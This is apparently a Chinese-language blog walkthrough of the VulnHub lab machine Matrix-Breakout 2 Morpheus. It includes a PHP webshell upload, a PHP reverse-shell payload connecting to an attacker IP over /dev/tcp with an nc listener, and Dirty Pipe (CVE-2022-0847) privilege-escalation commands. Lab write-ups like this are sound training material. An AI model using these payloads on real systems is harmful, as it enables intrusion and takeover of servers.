前言:本文中涉及到的技术,只提供思路,严禁用于违法测试
靶机地址
ttps://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
下载后使用VMware打开靶机
然后开始渗透
1.打开靶机显示登陆界面
2.因为不知道账号密码所以只能从外网入手。要渗透首先要知道IP,所以将两个虚拟机都改为NAT模式
然后我们进入攻击机查看IP以及靶机的IP,上面的是攻击机kali的ip地址,显然下面的就是靶机的IP。进行arp扫描,确定靶机IP地址,arp扫描命令为:arp-scan -l
3.使用nmap对靶机的端口进行扫描(超级用户权限下)
namp -A 192.168.159.137
发现80端口开着 肯定要去看看是什么
使用浏览器打开,通过IP访问web界面
4.查看端口详细信息,但也没什么收获
5.使用御剑进行目录扫描
robots.txtgraffiti.txtgraffiti.php
逐个查看,最后发现graffiti.php上传后在graffiti.txt中会有记录
6. 使用BP进行抓包,尝试传点东西上去
这里信息和文件名都写了,直接改就行
尝试写入一句话木马
<?php eval(@$_POST['123']);?>
7.访问1.php文件发现是空白的,说明上传成功了,如果失败访问界面是无
8.因此可以尝试蚁剑对webshell进行连接
9.后续可以直接在蚁剑上的虚拟终端进行操作,也可以反弹shell在kali攻击机上操作
蚁剑直接右键
或者kali的话需要再传一个木马
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.159.134/6666 0>&1'"); ?>
注意这里写的IP是攻击机kali的IP地址,因为是上传到靶机上的文件,通过靶机连接攻击机
通过BP用相同的方式上传,要注意的是上传的是URL编码后的内容。
注意,普通的URL编码只会编码特殊字符,一般网站上都是如此,但BP有一款自带的编码器,可以进行广义的URL编码,加密所有内容,如图
这样就上传成功了,后面再在kali中监听6666端口来进行反弹shell(先开监听端口再发送文件)
nc -lvvp 6666
10.到这里完成的就差不多了,后面就是进行提权(我这里是用蚁剑操作的)
先看看系统的版本
uname -a
查了一下,发现系统Linux4.x|5.x有漏洞能直接用CVE-2022-0847。
那就使用CVE-2022-0847
在kali上下载
git clone https://github.com/imfiver/CVE-2022-0847.git
要让Dirty-Pipe.sh这个文件到靶机赋权然后执行
然后靶机下载里面的文件
wget http://192.168.211.130:8080/CVE-2022-0847
进入该文件的目录,然后执行
bash ./Dirty-Pipe.sh
提权成功
可以查看/etc/passwd文件可以看到密码情况
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
